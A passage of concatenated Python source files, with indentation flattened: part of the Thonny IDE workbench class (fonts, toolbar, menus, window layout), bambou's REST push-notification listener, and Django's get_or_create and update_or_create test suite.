shell = self.get_view("ShellView", create=False)
except Exception:
# shell may be not created yet
pass
else:
shell.update_tabs()
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
# Update Treeview font and row height
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
treeview_font = tk_font.nametofont("TreeviewFont")
treeview_font.configure(size=treeview_font_size)
rowheight = round(treeview_font.metrics("linespace") * 1.2)
style = ttk.Style()
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
disabled_image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
if disabled_image is not None:
image_spec = [image, "disabled", disabled_image]
else:
image_spec = image
button = ttk.Button(
group_frame,
image=image_spec,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
def toolbar_handler(*args):
handler(*args)
self._update_toolbar()
if self.focus_get() == button:
# previously selected widget would be better candidate, but this is
# better than button
self._editor_notebook.focus_set()
button.configure(command=toolbar_handler)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(row=1, column=0, sticky=tk.NSEW, in_=widget.master) # type: ignore
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
if dlg.backend_restart_required:
get_runner().restart_backend(False)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
enabled = not tester
if tester:
try:
enabled = tester()
except Exception:
traceback.print_exc()
enabled = False
if enabled:
menu.entryconfigure(i, state=tk.NORMAL)
else:
menu.entryconfigure(i, state=tk.DISABLED)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _poll_ipc_requests(self) -> None:
try:
if self._ipc_requests.empty():
return
while not self._ipc_requests.empty():
args = self._ipc_requests.get()
try:
for filename in args:
if os.path.isfile(filename):
self.get_editor_notebook().show_file(filename)
except Exception:
traceback.print_exc()
self.become_active_window()
finally:
self.after(50, self._poll_ipc_requests)
def _on_close(self) -> None:
if self._editor_notebook and not self._editor_notebook.check_allow_closing():
return
self._closing = True
try:
self._save_layout()
self._editor_notebook.remember_open_files()
self.event_generate("WorkbenchClose")
self._configuration_manager.save()
except Exception:
self.report_exception()
self.destroy()
self._destroyed = True
def _on_all_key_presses(self, event):
if running_on_windows():
ui_utils.handle_mistreated_latin_shortcuts(self._latin_shortcuts, event)
def _on_focus_in(self, event):
if self._lost_focus:
self._lost_focus = False
self.event_generate("WindowFocusIn")
def _on_focus_out(self, event):
if self.focus_get() is None:
if not self._lost_focus:
self._lost_focus = True
self.event_generate("WindowFocusOut")
def focus_get(self) -> Optional[tk.Widget]:
try:
return tk.Tk.focus_get(self)
except Exception:
# This may give error in Ubuntu
return None
def destroy(self) -> None:
try:
if self._is_server() and os.path.exists(thonny.get_ipc_file_path()):
os.remove(thonny.get_ipc_file_path())
self._closing = True
# Tk clipboard gets cleared on exit and won't end up in system clipboard
# https://bugs.python.org/issue1207592
# https://stackoverflow.com/questions/26321333/tkinter-in-python-3-4-on-windows-dont-post-internal-clipboard-data-to-the-windo
try:
clipboard_data = self.clipboard_get()
if len(clipboard_data) < 1000 and all(
map(os.path.exists, clipboard_data.splitlines())
):
# Looks like the clipboard contains file name(s)
# Most likely this means actual file cut/copy operation
# was made outside of Thonny.
# Don't want to replace this with simple string data of file names.
pass
else:
copy_to_clipboard(clipboard_data)
except Exception:
pass
except Exception:
logging.exception("Error while destroying workbench")
finally:
try:
super().destroy()
finally:
runner = get_runner()
if runner != None:
runner.destroy_backend()
def _on_configure(self, event) -> None:
# called when window is moved or resized
if (
hasattr(self, "_maximized_view") # configure may happen before the attribute is defined
and self._maximized_view # type: ignore
):
# grid again, otherwise it acts weird
self._maximized_view.grid(
row=1, column=0, sticky=tk.NSEW, in_=self._maximized_view.master # type: ignore
)
def _on_tk_exception(self, exc, val, tb) -> None:
# copied from tkinter.Tk.report_callback_exception with modifications
# see http://bugs.python.org/issue22384
sys.last_type = exc
sys.last_value = val
sys.last_traceback = tb
self.report_exception()
def report_exception(self, title: str = "Internal error") -> None:
logging.exception(title)
if tk._default_root and not self._closing: # type: ignore
(typ, value, _) = sys.exc_info()
assert typ is not None
if issubclass(typ, UserError):
msg = str(value)
else:
msg = traceback.format_exc()
dlg = ui_utils.LongTextDialog(title, msg, parent=self)
ui_utils.show_dialog(dlg, self)
def _open_views(self) -> None:
for nb_name in self._view_notebooks:
view_name = self.get_option("layout.notebook_" + nb_name + "_visible_view")
if view_name != None:
if view_name == "GlobalsView":
# was renamed in 2.2b5
view_name = "VariablesView"
if self.get_ui_mode() != "simple" or view_name in SIMPLE_MODE_VIEWS:
self.show_view(view_name)
# make sure VariablesView is at least loaded
# otherwise it may miss globals events
# and will show empty table on open
self.get_view("VariablesView")
if (
self.get_option("assistance.open_assistant_on_errors")
or self.get_option("assistance.open_assistant_on_warnings")
) and (self.get_ui_mode() != "simple" or "AssistantView" in SIMPLE_MODE_VIEWS):
self.get_view("AssistantView")
def _save_layout(self) -> None:
self.update_idletasks()
self.set_option("layout.zoomed", ui_utils.get_zoomed(self))
for nb_name in self._view_notebooks:
widget = self._view_notebooks[nb_name].get_visible_child()
if hasattr(widget, "maximizable_widget"):
view = widget.maximizable_widget
view_name = type(view).__name__
self.set_option("layout.notebook_" + nb_name + "_visible_view", view_name)
else:
self.set_option("layout.notebook_" + nb_name + "_visible_view", None)
if not ui_utils.get_zoomed(self) or running_on_mac_os():
# can't restore zoom on mac without setting actual dimensions
gparts = re.findall(r"\d+", self.wm_geometry())
self.set_option("layout.width", int(gparts[0]))
self.set_option("layout.height", int(gparts[1]))
self.set_option("layout.left", int(gparts[2]))
self.set_option("layout.top", int(gparts[3]))
self.set_option("layout.west_pw_width", self._west_pw.preferred_size_in_pw)
self.set_option("layout.east_pw_width", self._east_pw.preferred_size_in_pw)
for key in ["nw", "sw", "s", "se", "ne"]:
self.set_option(
"layout.%s_nb_height" % key, self._view_notebooks[key].preferred_size_in_pw
)
def update_title(self, event=None) -> None:
editor = self.get_editor_notebook().get_current_editor()
if self._is_portable:
title_text = "Portable Thonny"
else:
title_text = "Thonny"
if editor != None:
title_text += " - " + editor.get_long_description()
self.title(title_text)
def become_active_window(self, force=True) -> None:
# Looks like at least on Windows all following is required
# for ensuring the window gets focus
# (deiconify, ..., iconify, deiconify)
self.deiconify()
if force:
self.attributes("-topmost", True)
self.after_idle(self.attributes, "-topmost", False)
self.lift()
if not running_on_linux():
# http://stackoverflow.com/a/13867710/261181
self.iconify()
self.deiconify()
editor = self.get_editor_notebook().get_current_editor()
if editor is not None:
# This method is meant to be called when new file is opened, so it's safe to
# send the focus to the editor
editor.focus_set()
else:
self.focus_set()
def open_url(self, url):
m = re.match(r"^thonny-editor://(.*?)(#(\d+)(:(\d+))?)?$", url)
if m is not None:
filename = m.group(1).replace("%20", " ")
lineno = None if m.group(3) is None else int(m.group(3))
col_offset = None if m.group(5) is None else int(m.group(5))
if lineno is None:
self.get_editor_notebook().show_file(filename)
else:
self.get_editor_notebook().show_file_at_line(filename, lineno, col_offset)
return
m = re.match(r"^thonny-help://(.*?)(#(.+))?$", url)
if m is not None:
topic = m.group(1)
fragment = m.group(3)
self.show_view("HelpView").load_topic(topic, fragment)
return
if url.endswith(".rst") and not url.startswith("http"):
parts = url.split("#", maxsplit=1)
topic = parts[0][:-4]
if len(parts) == 2:
fragment = parts[1]
else:
fragment = None
self.show_view("HelpView").load_topic(topic, fragment)
return
# Fallback
import webbrowser
webbrowser.open(url, False, True)
def open_help_topic(self, topic, fragment=None):
self.show_view("HelpView").load_topic(topic, fragment)
def bell(self, displayof=0):
if not self.get_option("general.disable_notification_sound"):
super().bell(displayof=displayof)
def _mac_quit(self, *args):
self._on_close()
def _is_server(self):
return self._ipc_requests is not None
def get_toolbar(self):
return self._toolbar
class WorkbenchEvent(Record):
def __init__(self, sequence: str, **kwargs) -> None:
Record.__init__(self, **kwargs)
self.sequence = sequence
|
nurest_push_center.py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from builtins import object
import json
import threading
from time import time
from .nurest_connection import NURESTConnection
from .nurest_request import NURESTRequest
from bambou import pushcenter_logger
class StoppableThread(threading.Thread):
""" Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition.
"""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stopper = threading.Event()
def stop(self):
self._stopper.set()
def stopped(self):
return self._stopper.isSet()
class NURESTPushCenter(object):
""" Push center wait for push notifications.
It has to listen a specific URL.
Every time a notification is send, it will automatically get it
and store it into get_last_events method.
"""
def __init__(self):
""" Initialize push center """
self._url = None
self._is_running = False
self._current_connection = None
self._last_events = list()
self.nb_events_received = 0
self.nb_push_received = 0
self._thread = None
self._root_object = None
self._start_time = None
self._timeout = None
self._delegate_methods = list()
# Properties
@property
def url(self):
""" Get url """
return self._url
@url.setter
def url(self, url):
""" Set url """
self._url = url
@property
def is_running(self):
""" Get is_running """
return self._is_running
# Control Methods
def start(self, timeout=None, root_object=None):
""" Starts listening to events.
Args:
timeout (int): number of seconds before timeout. Used for testing purpose only.
root_object (bambou.NURESTRootObject): NURESTRootObject object that is listening. Used for testing purpose only.
"""
if self._is_running:
return
if timeout:
self._timeout = timeout
self._start_time = int(time())
pushcenter_logger.debug("[NURESTPushCenter] Starting push center on url %s ..." % self.url)
self._is_running = True
self.__root_object = root_object
from .nurest_session import NURESTSession
current_session = NURESTSession.get_current_session()
args_session = {'session': current_session}
self._thread = StoppableThread(target=self._listen, name='push-center', kwargs=args_session)
self._thread.daemon = True
self._thread.start()
def stop(self):
""" Stops listening for events. """
if not self._is_running:
return
pushcenter_logger.debug("[NURESTPushCenter] Stopping...")
self._thread.stop()
self._thread.join()
self._is_running = False
self._current_connection = None
self._start_time = None
self._timeout = None
def wait_until_exit(self):
""" Wait until thread exit
Used for testing purpose only
"""
if self._timeout is None:
raise Exception("Thread will never exit. Use stop or specify timeout when starting it!")
self._thread.join()
self.stop()
# Events
def get_last_events(self):
""" Retrieve events that has been
Returns:
Returns a list of events and flush existing events.
"""
events = self._last_events
self._last_events = list()
return events
# Private methods
def _did_receive_event(self, connection):
""" Receive an event from connection """
if not self._is_running:
return
if connection.has_timeouted:
return
response = connection.response
data = None
if response.status_code != 200:
pushcenter_logger.error("[NURESTPushCenter]: Connection failure [%s] %s" % (response.status_code, response.errors))
else:
data = response.data
if len(self._delegate_methods) > 0:
for m in self._delegate_methods:
try:
m(data)
except Exception as exc:
pushcenter_logger.error("[NURESTPushCenter] Delegate method %s failed:\n%s" % (m, exc))
elif data:
events = data['events']
self.nb_events_received += len(events)
self.nb_push_received += 1
pushcenter_logger.info("[NURESTPushCenter] Received Push #%s (total=%s, latest=%s)\n%s" % (self.nb_push_received, self.nb_events_received, len(events), json.dumps(events, indent=4)))
self._last_events.extend(events)
if self._is_running:
uuid = None
if data and 'uuid' in data:
uuid = data['uuid']
self._listen(uuid)
def _listen(self, uuid=None, session=None):
""" Listen a connection uuid """
if self.url is None:
raise Exception("NURESTPushCenter needs to have a valid URL. please use setURL: before starting it.")
events_url = "%s/events" % self.url
if uuid:
events_url = "%s?uuid=%s" % (events_url, uuid)
request = NURESTRequest(method='GET', url=events_url)
# Force as_async to False so the push center will have only 1 thread running
connection = NURESTConnection(request=request, as_async=True, callback=self._did_receive_event, root_object=self._root_object)
if self._timeout:
if int(time()) - self._start_time >= self._timeout:
pushcenter_logger.debug("[NURESTPushCenter] Timeout (timeout=%ss)." % self._timeout)
return
else:
connection.timeout = self._timeout
pushcenter_logger.info('Bambou Sending >>>>>>\n%s %s' % (request.method, request.url))
# connection.ignore_request_idle = True
connection.start()
def add_delegate(self, callback):
""" Registers a new delegate callback
The prototype should be function(data), where data will be the decoded json push
Args:
callback (function): method to trigger when push center receives events
"""
if callback in self._delegate_methods:
return
self._delegate_methods.append(callback)
def remove_delegate(self, callback):
""" Unregisters a registered delegate function or a method.
Args:
callback(function): method to trigger when push center receives events
"""
if callback not in self._delegate_methods:
return
self._delegate_methods.remove(callback)
|
tests.py | import time
import traceback
from datetime import date, datetime, timedelta
from threading import Thread
from django.core.exceptions import FieldError
from django.db import DatabaseError, IntegrityError, connection
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipUnlessDBFeature,
)
from .models import (
Author, Book, DefaultPerson, ManualPrimaryKeyTest, Person, Profile,
Publisher, Tag, Thing,
)
class GetOrCreateTests(TestCase):
def setUp(self):
self.lennon = Person.objects.create(
first_name='John', last_name='Lennon', birthday=date(1940, 10, 9)
)
def test_get_or_create_method_with_get(self):
created = Person.objects.get_or_create(
first_name="John", last_name="Lennon", defaults={
"birthday": date(1940, 10, 9)
}
)[1]
self.assertFalse(created)
self.assertEqual(Person.objects.count(), 1)
def test_get_or_create_method_with_create(self):
created = Person.objects.get_or_create(
first_name='George', last_name='Harrison', defaults={
'birthday': date(1943, 2, 25)
}
)[1]
self.assertTrue(created)
self.assertEqual(Person.objects.count(), 2)
def test_get_or_create_redundant_instance(self):
"""
If we execute the exact same statement twice, the second time,
it won't create a Person.
"""
Person.objects.get_or_create(
first_name='George', last_name='Harrison', defaults={
'birthday': date(1943, 2, 25)
}
)
created = Person.objects.get_or_create(
first_name='George', last_name='Harrison', defaults={
'birthday': date(1943, 2, 25)
}
)[1]
self.assertFalse(created)
self.assertEqual(Person.objects.count(), 2)
def test_get_or_create_invalid_params(self):
"""
If you don't specify a value or default value for all required
fields, you will get an error.
"""
with self.assertRaises(IntegrityError):
Person.objects.get_or_create(first_name="Tom", last_name="Smith")
def test_get_or_create_with_pk_property(self):
"""
Using the pk property of a model is allowed.
"""
Thing.objects.get_or_create(pk=1)
def test_get_or_create_on_related_manager(self):
p = Publisher.objects.create(name="Acme Publishing")
# Create a book through the publisher.
book, created = p.books.get_or_create(name="The Book of Ed & Fred")
self.assertTrue(created)
# The publisher should have one book.
self.assertEqual(p.books.count(), 1)
# Try get_or_create again, this time nothing should be created.
book, created = p.books.get_or_create(name="The Book of Ed & Fred")
self.assertFalse(created)
# And the publisher should still have one book.
self.assertEqual(p.books.count(), 1)
# Add an author to the book.
ed, created = book.authors.get_or_create(name="Ed")
self.assertTrue(created)
# The book should have one author.
self.assertEqual(book.authors.count(), 1)
# Try get_or_create again, this time nothing should be created.
ed, created = book.authors.get_or_create(name="Ed")
self.assertFalse(created)
# And the book should still have one author.
self.assertEqual(book.authors.count(), 1)
# Add a second author to the book.
fred, created = book.authors.get_or_create(name="Fred")
self.assertTrue(created)
# The book should have two authors now.
self.assertEqual(book.authors.count(), 2)
# Create an Author not tied to any books.
Author.objects.create(name="Ted")
# There should be three Authors in total. The book object should have two.
self.assertEqual(Author.objects.count(), 3)
self.assertEqual(book.authors.count(), 2)
# Try creating a book through an author.
_, created = ed.books.get_or_create(name="Ed's Recipes", publisher=p)
self.assertTrue(created)
# Now Ed has two Books, Fred just one.
self.assertEqual(ed.books.count(), 2)
self.assertEqual(fred.books.count(), 1)
# Use the publisher's primary key value instead of a model instance.
_, created = ed.books.get_or_create(name='The Great Book of Ed', publisher_id=p.id)
self.assertTrue(created)
# Try get_or_create again, this time nothing should be created.
_, created = ed.books.get_or_create(name='The Great Book of Ed', publisher_id=p.id)
self.assertFalse(created)
# The publisher should have three books.
self.assertEqual(p.books.count(), 3)
def test_defaults_exact(self):
"""
If you have a field named defaults and want to use it as an exact
lookup, you need to use 'defaults__exact'.
"""
obj, created = Person.objects.get_or_create(
first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
'birthday': date(1943, 2, 25),
'defaults': 'testing',
}
)
self.assertTrue(created)
self.assertEqual(obj.defaults, 'testing')
obj2, created = Person.objects.get_or_create(
first_name='George', last_name='Harrison', defaults__exact='testing', defaults={
'birthday': date(1943, 2, 25),
'defaults': 'testing',
}
)
self.assertFalse(created)
self.assertEqual(obj, obj2)
def test_callable_defaults(self):
"""
Callables in `defaults` are evaluated if the instance is created.
"""
obj, created = Person.objects.get_or_create(
first_name="George",
defaults={"last_name": "Harrison", "birthday": lambda: date(1943, 2, 25)},
)
self.assertTrue(created)
self.assertEqual(date(1943, 2, 25), obj.birthday)
def test_callable_defaults_not_called(self):
def raise_exception():
raise AssertionError
obj, created = Person.objects.get_or_create(
first_name="John", last_name="Lennon",
defaults={"birthday": lambda: raise_exception()},
)
class GetOrCreateTestsWithManualPKs(TestCase):
def setUp(self):
self.first_pk = ManualPrimaryKeyTest.objects.create(id=1, data="Original")
def test_create_with_duplicate_primary_key(self):
"""
If you specify an existing primary key, but different other fields,
then you will get an error and data will not be updated.
"""
with self.assertRaises(IntegrityError):
ManualPrimaryKeyTest.objects.get_or_create(id=1, data="Different")
self.assertEqual(ManualPrimaryKeyTest.objects.get(id=1).data, "Original")
def test_get_or_create_raises_IntegrityError_plus_traceback(self):
"""
get_or_create should raise IntegrityErrors with the full traceback.
This is tested by checking that a known method call is in the traceback.
We cannot use assertRaises here because we need to inspect
the actual traceback. Refs #16340.
"""
try:
ManualPrimaryKeyTest.objects.get_or_create(id=1, data="Different")
except IntegrityError:
formatted_traceback = traceback.format_exc()
self.assertIn('obj.save', formatted_traceback)
def test_savepoint_rollback(self):
"""
The database connection is still usable after a DatabaseError in
get_or_create() (#20463).
"""
Tag.objects.create(text='foo')
with self.assertRaises(DatabaseError):
# pk 123456789 doesn't exist, so the tag object will be created.
# Saving triggers a unique constraint violation on 'text'.
Tag.objects.get_or_create(pk=123456789, defaults={'text': 'foo'})
# Tag objects can be created after the error.
Tag.objects.create(text='bar')
def test_get_or_create_empty(self):
"""
If all the attributes on a model have defaults, get_or_create() doesn't
require any arguments.
"""
DefaultPerson.objects.get_or_create()
class GetOrCreateTransactionTests(TransactionTestCase):
available_apps = ['get_or_create']
def test_get_or_create_integrityerror(self):
"""
Regression test for #15117. Requires a TransactionTestCase on
databases that delay integrity checks until the end of transactions,
otherwise the exception is never raised.
"""
try:
Profile.objects.get_or_create(person=Person(id=1))
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
class GetOrCreateThroughManyToMany(TestCase):
def test_get_get_or_create(self):
tag = Tag.objects.create(text='foo')
a_thing = Thing.objects.create(name='a')
a_thing.tags.add(tag)
obj, created = a_thing.tags.get_or_create(text='foo')
self.assertFalse(created)
self.assertEqual(obj.pk, tag.pk)
def test_create_get_or_create(self):
a_thing = Thing.objects.create(name='a')
obj, created = a_thing.tags.get_or_create(text='foo')
self.assertTrue(created)
self.assertEqual(obj.text, 'foo')
self.assertIn(obj, a_thing.tags.all())
def test_something(self):
Tag.objects.create(text='foo')
a_thing = Thing.objects.create(name='a')
with self.assertRaises(IntegrityError):
a_thing.tags.get_or_create(text='foo')
class UpdateOrCreateTests(TestCase):
def test_update(self):
Person.objects.create(
first_name='John', last_name='Lennon', birthday=date(1940, 10, 9)
)
p, created = Person.objects.update_or_create(
first_name='John', last_name='Lennon', defaults={
'birthday': date(1940, 10, 10)
}
)
self.assertFalse(created)
self.assertEqual(p.first_name, 'John')
self.assertEqual(p.last_name, 'Lennon')
self.assertEqual(p.birthday, date(1940, 10, 10))
def test_create(self):
p, created = Person.objects.update_or_create(
first_name='John', last_name='Lennon', defaults={
'birthday': date(1940, 10, 10)
}
)
self.assertTrue(created)
self.assertEqual(p.first_name, 'John')
self.assertEqual(p.last_name, 'Lennon')
self.assertEqual(p.birthday, date(1940, 10, 10))
def test_create_twice(self):
params = {
'first_name': 'John',
'last_name': 'Lennon',
'birthday': date(1940, 10, 10),
}
Person.objects.update_or_create(**params)
# If we execute the exact same statement, it won't create a Person.
p, created = Person.objects.update_or_create(**params)
self.assertFalse(created)
def test_integrity(self):
"""
If you don't specify a value or default value for all required
fields, you will get an error.
"""
with self.assertRaises(IntegrityError):
Person.objects.update_or_create(first_name="Tom", last_name="Smith")
def test_manual_primary_key_test(self):
"""
If you specify an existing primary key, but different other fields,
then you will get an error and data will not be updated.
"""
ManualPrimaryKeyTest.objects.create(id=1, data="Original")
with self.assertRaises(IntegrityError):
ManualPrimaryKeyTest.objects.update_or_create(id=1, data="Different")
self.assertEqual(ManualPrimaryKeyTest.objects.get(id=1).data, "Original")
def test_with_pk_property(self):
"""
Using the pk property of a model is allowed.
"""
Thing.objects.update_or_create(pk=1)
def test_error_contains_full_traceback(self):
"""
update_or_create should raise IntegrityErrors with the full traceback.
This is tested by checking that a known method call is in the traceback.
We cannot use assertRaises/assertRaises here because we need to inspect
the actual traceback. Refs #16340.
"""
try:
ManualPrimaryKeyTest.objects.update_or_create(id=1, data="Different")
except IntegrityError:
formatted_traceback = traceback.format_exc()
self.assertIn('obj.save', formatted_traceback)
def test_create_with_related_manager(self):
"""
Should be able to use update_or_create from the related manager to
create a book. Refs #23611.
"""
p = Publisher.objects.create(name="Acme Publishing")
book, created = p.books.update_or_create(name="The Book of Ed & Fred")
self.assertTrue(created)
